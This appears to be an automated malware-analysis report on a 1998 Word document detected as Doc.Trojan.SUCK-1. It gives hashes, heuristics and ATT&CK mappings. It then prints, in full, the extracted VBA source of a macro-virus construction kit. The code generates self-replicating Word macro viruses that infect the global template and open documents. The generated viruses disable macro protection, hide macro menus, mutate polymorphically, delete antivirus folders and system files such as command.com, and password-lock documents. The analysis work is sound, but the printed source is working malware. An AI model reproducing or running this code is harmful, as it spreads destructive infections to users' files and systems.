Office (OLE) malware analysis — malicious · 86418fb63b28965e

MALICIOUS

Office (OLE)

245.0 KB Created: 1998-09-12 18:05:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 72f3b99de76e677659325fdaadd73117 SHA-1: 770d3e2b3956cc7a989eff996136cd189f61327d SHA-256: 86418fb63b28965ec64519576d0fa2ac70d4ff24c8ae1be7e631aabb9325c441

256 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample exhibits multiple high and critical heuristic firings related to legacy WordBasic and VBA macros, including AutoOpen and Auto_Close. The ClamAV detection explicitly identifies it as 'Doc.Trojan.SUCK-1'. The VBA script appears to be a construction kit for creating new macro viruses, suggesting the primary purpose is to infect other documents and spread.

Heuristics 6

ClamAV: Doc.Trojan.SUCK-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.SUCK-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
  Print #1, "Options.VirusProtection = False"
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
  Print #1, "'AutoOpen"
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
  Print #1, "'AutoClose"
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	22615 bytes
SHA-256: `194361d58944889804774847d3dcb68e6451ceb9afe45a3076480ba1ea6455f3`
Detection ClamAV: Doc.Trojan.SUCK-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Uwelcome" Attribute VB_Base = "0{371CC928-5EC4-11D2-8259-F0257497D601}{371CC900-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() Uwelcome.Hide UInfect.Show End Sub Attribute VB_Name = "Umain" Attribute VB_Base = "0{371CC931-5EC4-11D2-8259-F0257497D601}{371CC908-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton2_Click() Uabout.Show End Sub Private Sub CommandButton3_Click() Umain.Hide End End Sub Private Sub CommandButton1_Click() On Error Resume Next Viriis = "" & Umain.TextBox1 & "" & ".bas" VirusName = Umain.TextBox1 Open Viriis For Output As #1 Print #1, "Attribute VB_Name = """; Umain.TextBox1 Print #1, Print #1, "'Mini ULTRAS Construction Kit (MUCK)" Print #1, "'ULTRAS 1998" Print #1, Print #1, "'VirusName: " & Umain.TextBox1 Print #1, "'Author Name: " & Umain.TextBox2 Print #1, "'Date and Time:" & Now Print #1, If UInfect.ao = True Then Print #1, Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "'AutoOpen" Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "Sub AutoOpen()" Print #1, "On Error Resume Next" If UKillAV.a1 = True Or UKillAV.a2 = True Or UKillAV.a3 = True Or UKillAV.a4 = True Or UKillAV.a5 = True Or UKillAV.a6 = True Or UKillAV.a7 = True Or UKillAV.a8 = True Then Print #1, "Call KillAV" End If If UPayload.p1 = True Or UPayload.p2 = True Or UPayload.p3 = True Or UPayload.p4 = True Or UPayload.p5 = True Or UPayload.p6 = True Or UPayload.p7 = True Or UPayload.p8 = True Or UPayload.p9 = True Or UPayload.p10 = True Then Print #1, "Call Payload" End If Print #1, "Application.ScreenUpdating = False" Print #1, "Application.DisplayAlerts = wdAlertsNone" Print #1, "Options.VirusProtection = False" Print #1, "DocInfect = False" Print #1, "GlobInfect = False" Print #1, "Set GlobalDoc = NormalTemplate" Print #1, "Set ActiveDoc = ActiveDocument" Print #1, "For i = 1 To ActiveDocument.VBProject.VBComponents.Count" Print #1, "If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then" Print #1, "DocInfect = True" Print #1, "End If" Print #1, "Next" Print #1, "For j = 1 To NormalTemplate.VBProject.VBComponents.Count" Print #1, "If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then" Print #1, "GlobInfect = True" Print #1, "End If" Print #1, "Next" Print #1, "If GlobInfect = False Then" Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, "Options.SaveNormalPrompt = False" Print #1, "End If" Print #1, "If DocInfect = False Then" Print #1, "Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, "ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate" Print #1, "End If" Print #1, "Application.DisplayAlerts = wdAlertsAll" If Umain.poly = True Then Print #1, "Call Polymorphic" End If Print #1, "End Sub" Print #1, End If If UInfect.ac = True Then Print #1, Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "'AutoClose" Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "Sub AutoClose()" Print #1, "On Error Resume Next" If UKillAV.a1 = True Or UKillAV.a2 = True Or UKillAV.a3 = True Or UKillAV.a4 = True Or UKillAV.a5 = True Or UKillAV.a6 = True Or UKillAV.a7 = True Or UKillAV.a8 = True Then Print #1, "Call KillAV" End If If UPayload.p1 = True Or UPayload.p2 = True Or UPayload.p3 = True Or UPayload.p4 = True Or UPayload.p5 = True Or UPayload.p6 = True Or UPayload.p7 = True Or UPayload.p8 = True Or UPayload.p9 = True Or UPayload.p10 = True Then Print #1, "Call Payload" End If Print #1, "Application.ScreenUpdating = False" Print #1, "Application.DisplayAlerts = wdAlertsNone" Print #1, "Options.VirusProtection = False" Print #1, "DocInfect = False" Print #1, "GlobInfect = False" Print #1, "Set GlobalDoc = NormalTemplate" Print #1, "Set ActiveDoc = ActiveDocument" Print #1, "For i = 1 To ActiveDocument.VBProject.VBComponents.Count" Print #1, "If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then" Print #1, "DocInfect = True" Print #1, "End If" Print #1, "Next" Print #1, "For j = 1 To NormalTemplate.VBProject.VBComponents.Count" Print #1, "If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then" Print #1, "GlobInfect = True" Print #1, "End If" Print #1, "Next" Print #1, "If GlobInfect = False Then" Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, "Options.SaveNormalPrompt = False" Print #1, "End If" Print #1, "If DocInfect = False Then" Print #1, "Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, "ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate" Print #1, "End If" Print #1, "Application.DisplayAlerts = wdAlertsAll" If Umain.poly = True Then Print #1, "Call Polymorphic" End If Print #1, "End Sub" Print #1, End If If UInfect.ae = True Then Print #1, Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "'AutoExec" Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "Sub AutoExec()" Print #1, "On Error Resume Next" If UKillAV.a1 = True Or UKillAV.a2 = True Or UKillAV.a3 = True Or UKillAV.a4 = True Or UKillAV.a5 = True Or UKillAV.a6 = True Or UKillAV.a7 = True Or UKillAV.a8 = True Then Print #1, "Call KillAV" End If If UPayload.p1 = True Or UPayload.p2 = True Or UPayload.p3 = True Or UPayload.p4 = True Or UPayload.p5 = True Or UPayload.p6 = True Or UPayload.p7 = True Or UPayload.p8 = True Or UPayload.p9 = True Or UPayload.p10 = True Then Print #1, "Call Payload" End If Print #1, "Application.ScreenUpdating = False" Print #1, "Application.DisplayAlerts = wdAlertsNone" Print #1, "Options.VirusProtection = False" Print #1, "DocInfect = False" Print #1, "GlobInfect = False" Print #1, "Set GlobalDoc = NormalTemplate" Print #1, "Set ActiveDoc = ActiveDocument" Print #1, "For i = 1 To ActiveDocument.VBProject.VBComponents.Count" Print #1, "If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then" Print #1, "DocInfect = True" Print #1, "End If" Print #1, "Next" Print #1, "For j = 1 To NormalTemplate.VBProject.VBComponents.Count" Print #1, "If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then" Print #1, "GlobInfect = True" Print #1, "End If" Print #1, "Next" Print #1, "If GlobInfect = False Then" Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, "Options.SaveNormalPrompt = False" Print #1, "End If" Print #1, "If DocInfect = False Then" Print #1, "Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, "ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate" Print #1, "End If" Print #1, "Application.DisplayAlerts = wdAlertsAll" If Umain.poly = True Then Print #1, "Call Polymorphic" End If Print #1, "End Sub" Print #1, End If If UInfect.fs = True Then Print #1, Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "'FileSave" Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "Sub AutoOpen()" Print #1, "On Error Resume Next" If UKillAV.a1 = True Or UKillAV.a2 = True Or UKillAV.a3 = True Or UKillAV.a4 = True Or UKillAV.a5 = True Or UKillAV.a6 = True Or UKillAV.a7 = True Or UKillAV.a8 = True Then Print #1, "Call KillAV" End If If UPayload.p1 = True Or UPayload.p2 = True Or UPayload.p3 = True Or UPayload.p4 = True Or UPayload.p5 = True Or UPayload.p6 = True Or UPayload.p7 = True Or UPayload.p8 = True Or UPayload.p9 = True Or UPayload.p10 = True Then Print #1, "Call Payload" End If Print #1, "Application.ScreenUpdating = False" Print #1, "Application.DisplayAlerts = wdAlertsNone" Print #1, "Options.VirusProtection = False" Print #1, "DocInfect = False" Print #1, "GlobInfect = False" Print #1, "Set GlobalDoc = NormalTemplate" Print #1, "Set ActiveDoc = ActiveDocument" Print #1, "For i = 1 To ActiveDocument.VBProject.VBComponents.Count" Print #1, "If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then" Print #1, "DocInfect = True" Print #1, "End If" Print #1, "Next" Print #1, "For j = 1 To NormalTemplate.VBProject.VBComponents.Count" Print #1, "If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then" Print #1, "GlobInfect = True" Print #1, "End If" Print #1, "Next" Print #1, "If GlobInfect = False Then" Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, "Options.SaveNormalPrompt = False" Print #1, "End If" Print #1, "If DocInfect = False Then" Print #1, "Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, "ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate" Print #1, "End If" Print #1, "Application.DisplayAlerts = wdAlertsAll" If Umain.poly = True Then Print #1, "Call Polymorphic" End If Print #1, "ActiveDocument.Save" Print #1, "End Sub" Print #1, End If If Umain.stealth = True Then Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "'ToolsMacro macro" Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "Sub ToolsMacro()" If Umain.poly = True Then Print #1, "Call Polymorphic" End If Print #1, "Beep" Print #1, "End Sub" Print #1, Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "'ViewVBCode macro" Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "Sub ViewVBCode()" If Umain.poly = True Then Print #1, "Call Polymorphic" End If Print #1, "Beep" Print #1, "End Sub" Print #1, Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "'ToolsCustomize macro" Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "Sub ToolsCustomize()" If Umain.poly = True Then Print #1, "Call Polymorphic" End If Print #1, "Beep" Print #1, "End Sub" Print #1, Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "'FileTemplates macro" Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "Sub FileTemplates()" If Umain.poly = True Then Print #1, "Call Polymorphic" End If Print #1, "Beep" Print #1, "End Sub" Print #1, End If If Umain.poly = True Then Print #1, Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "'Polymorphic macro" Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "Sub Polymorphic()" Print #1, "On Error Resume Next" Print #1, "PoNu = Int(Rnd() * 28 + 1)" Print #1, "For Mutate = 1 To PoNu" Print #1, "PoRL = Application.VBE.ActiveVBProject.VBComponents(""" & VirusName & """).CodeModule.CountOfLines" Print #1, "PoLi = Int(Rnd() * PoRL + 1)" Print #1, "a = Rnd * 455: b = Rnd * 80: c = Rnd * 160: d = Rnd * 180: e = Rnd * 49" Print #1, "Application.VBE.ActiveVBProject.VBComponents(""" & VirusName & """).CodeModule.InsertLines PoLi, vbTab & ""Rem "" & a & vbTab & b & vbTab & c & vbTab & d & vbTab & e " Print #1, "Next Mutate" Print #1, "End Sub" End If If UKillAV.a1 = True Or UKillAV.a2 = True Or UKillAV.a3 = True Or UKillAV.a4 = True Or UKillAV.a5 = True Or UKillAV.a6 = True Or UKillAV.a7 = True Or UKillAV.a8 = True Then Print #1, Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "'KillAV macro" Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "Sub KillAV()" Print #1, "On Error Resume Next" End If If UKillAV.a1 = True Then Print #1, "Kill ""C:\Program Files\AntiViral Toolkit Pro\.""" End If If UKillAV.a3 = True Then Print #1, "Kill ""C:\Program Files\Command Software\F-PROT95\.""" End If If UKillAV.a2 = True Then Print #1, "Kill ""C:\Program Files\FindVirus\.""" Print #1, "Kill ""C:\Toolkit\FindVirus\.""" End If If UKillAV.a5 = True Then Print #1, "Kill ""C:\Program Files\Quick Heal\.""" End If If UKillAV.a4 = True Then Print #1, "Kill ""C:\Program Files\McAfee\VirusScan95\.""" End If If UKillAV.a6 = True Then Print #1, "Kill ""C:\Program Files\Norton AntiVirus\.""" End If If UKillAV.a7 = True Then Print #1, "Kill ""C:\TBAVW95\.""" End If If UKillAV.a8 = True Then Print #1, "Kill ""C:\VS95\.""" End If If UKillAV.a1 = True Or UKillAV.a2 = True Or UKillAV.a3 = True Or UKillAV.a4 = True Or UKillAV.a5 = True Or UKillAV.a6 = True Or UKillAV.a7 = True Or UKillAV.a8 = True Then Print #1, "End Sub" Print #1, End If If UPayload.p1 = True Or UPayload.p2 = True Or UPayload.p3 = True Or UPayload.p4 = True Or UPayload.p5 = True Or UPayload.p6 = True Or UPayload.p7 = True Or UPayload.p8 = True Or UPayload.p9 = True Or UPayload.p10 = True Then Print #1, Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "'Payload macro" Print #1, "'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" Print #1, "Sub Payload()" Print #1, "On Error Resume Next" Print #1, "U = Int(Rnd() * 30) + 1" Print #1, "If Day(Now()) = MUCK Then" If UPayload.p5 = True Then Print #1, "Assistant.Visible = True" Print #1, "With Assistant.NewBalloon" Print #1, " .Text = """ & UAssistant.txtMessage & """" Print #1, " .Heading = """ & UAssistant.txtHeading & """" Print #1, " .Animation = msoAnimationEmptyTrash" Print #1, " .Show" Print #1, "End With" End If If UPayload.p9 = True Then Print #1, "For p = 1 To 6" Print #1, "LiVe = Int(Rnd() * (120 - 100) + 228)" Print #1, "GenPas = GenPas + Chr$(LiVe)" Print #1, "Next" Print #1, "ActiveDocument.Password = GenPas" Print #1, "ActiveDocument.Save" End If If UPayload.p10 = True Then Print #1, "Application.Caption = """ & UCaption.txtCaption & """" End If If UPayload.p6 = True Then Print #1, "Application.StatusBar = True" Print #1, "StatusBar = """ & UStatusBar.s1 & """" End If If UPayload.p1 = True Then Print #1, "MsgBox """ & UMessageBox.m2 & """,vbOKonly,""" & UMessageBox.m1 & """" End If If UPayload.p8 = True Then Print #1, "ActiveDocument.Password = """" & Application.UserName" Print #1, "ActiveDocument.Save " End If If UPayload.p2 = True Then Print #1, "ActiveDocument.Password = """ & UPassword.ps2 & """" Print #1, "ActiveDocument.Save" Print #1, End If If UPayload.p3 = True Then Print #1, "With ActiveDocument.Range(Start:=0, End:=0)" Print #1, " .InsertBefore = """ & UFilePrint.fp1 & """" Print #1, " .Font.Name = """ & UFilePrint.fp2 & """" Print #1, " .Font.Size = """ & UFilePrint.fp3 & """" If UFilePrint.f3 = True Then Print #1, ".Font.Shadow = 1" End If If UFilePrint.f2 = True Then Print #1, ".Font.Animation = 6" End If Print #1, "End With" End If If UPayload.p4 = True Then Print #1, "Kill ""c:\autoexec.bat""" Print #1, "Kill ""c:\command.com""" Print #1, End If If UPayload.p7 = True Then Print #1, "Application.UserName = """ & UUser.TB1 & """" Print #1, "Application.UserInitials = """ & UUser.TB2 & """" Print #1, "Application.UserAddress = """ & UUser.TB3 & """" End If If UPayload.p1 = True Or UPayload.p2 = True Or UPayload.p3 = True Or UPayload.p4 = True Or UPayload.p5 = True Or UPayload.p6 = True Or UPayload.p7 = True Or UPayload.p8 = True Or UPayload.p9 = True Or UPayload.p10 = True Then Print #1, "End If" Print #1, "End Sub" End If End If Close #1 MsgBox "Macro Virus " & Umain.TextBox1 & " Created Successfully!", vbCritical + vbOKOnly, "MUCK" End End Sub Private Sub Kill_Click() UKillAV.Show End Sub Private Sub Payl_Click() UPayload.Show End Sub Attribute VB_Name = "Uabout" Attribute VB_Base = "0{371CC938-5EC4-11D2-8259-F0257497D601}{371CC90A-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() Uabout.Hide End Sub Attribute VB_Name = "UInfect" Attribute VB_Base = "0{371CC93C-5EC4-11D2-8259-F0257497D601}{371CC90C-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() UInfect.Hide Umain.Show End Sub Attribute VB_Name = "UKillAV" Attribute VB_Base = "0{371CC940-5EC4-11D2-8259-F0257497D601}{371CC90E-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() UKillAV.Hide End Sub Attribute VB_Name = "UUser" Attribute VB_Base = "0{371CC944-5EC4-11D2-8259-F0257497D601}{371CC910-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() URegisters.Hide End Sub Attribute VB_Name = "UPayload" Attribute VB_Base = "0{371CC948-5EC4-11D2-8259-F0257497D601}{371CC912-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() UPayload.Hide End Sub Private Sub CommandButton3_Click() End End Sub Private Sub p1_Click() UMessage.Show End Sub Private Sub p10_Click() UCaption.Show End Sub Private Sub p2_Click() UPassword.Show End Sub Private Sub p3_Click() UFilePrint.Show End Sub Private Sub p5_Click() UAssistant.Show End Sub Private Sub p6_Click() UStatusBar.Show End Sub Private Sub p7_Click() UUser.Show End Sub Attribute VB_Name = "UAssistant" Attribute VB_Base = "0{371CC94C-5EC4-11D2-8259-F0257497D601}{371CC914-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() UAssistant.Hide End Sub Attribute VB_Name = "UCaption" Attribute VB_Base = "0{371CC950-5EC4-11D2-8259-F0257497D601}{371CC916-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() UCaption.Hide End Sub Attribute VB_Name = "UPassword" Attribute VB_Base = "0{371CC954-5EC4-11D2-8259-F0257497D601}{371CC918-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() UPassword.Hide End Sub Attribute VB_Name = "UFilePrint" Attribute VB_Base = "0{371CC958-5EC4-11D2-8259-F0257497D601}{371CC91A-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() UFilePrint.Hide End Sub Attribute VB_Name = "UMessage" Attribute VB_Base = "0{371CC95C-5EC4-11D2-8259-F0257497D601}{371CC91C-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() UMessage.Hide End Sub Attribute VB_Name = "UStatusBar" Attribute VB_Base = "0{371CC960-5EC4-11D2-8259-F0257497D601}{371CC91E-5EC4-11D2-8259-F0257497D601}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() UStatusBar.Hide End Sub Attribute VB_Name = "MUCK" Sub AutoOpen() Uwelcome.Show End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.